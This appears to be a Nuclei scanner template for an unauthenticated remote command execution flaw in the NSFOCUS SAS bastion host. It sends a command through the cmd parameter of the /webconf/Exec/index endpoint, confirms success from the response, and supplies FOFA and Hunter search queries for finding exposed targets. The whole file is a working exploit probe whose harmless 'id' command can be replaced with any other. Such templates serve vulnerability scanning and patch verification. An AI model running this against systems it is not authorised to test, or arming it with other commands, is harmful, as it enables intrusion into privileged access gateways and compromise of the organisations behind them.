id: Nsfocus-SAS-rce-Exec

info:
  name: Nsfocus-SAS-rce-Exec
  author: p1z
  severity: critical
  description: |
     绿盟 SAS堡垒机 Exec 远程命令执行漏洞
  reference:
    https://mp.weixin.qq.com/s/qHPo0noFTvJoEcor00qtDg
  metadata:
    fofa-query: title=="NSFOCUS&nbsp;SAS[H]"
    hunter-query: app.name="NSFOCUS 绿盟 SAS"
    verified: true
  tags: 2023,Nsfocus,SAS,login-bypass

requests:
  - method: GET
    path:
      - "{{BaseURL}}/webconf/Exec/index?cmd={{cmd}}"
    payloads:
      cmd:
        - id
    matchers:
      - type: word
        part: body
        words:
          - 'CDATA'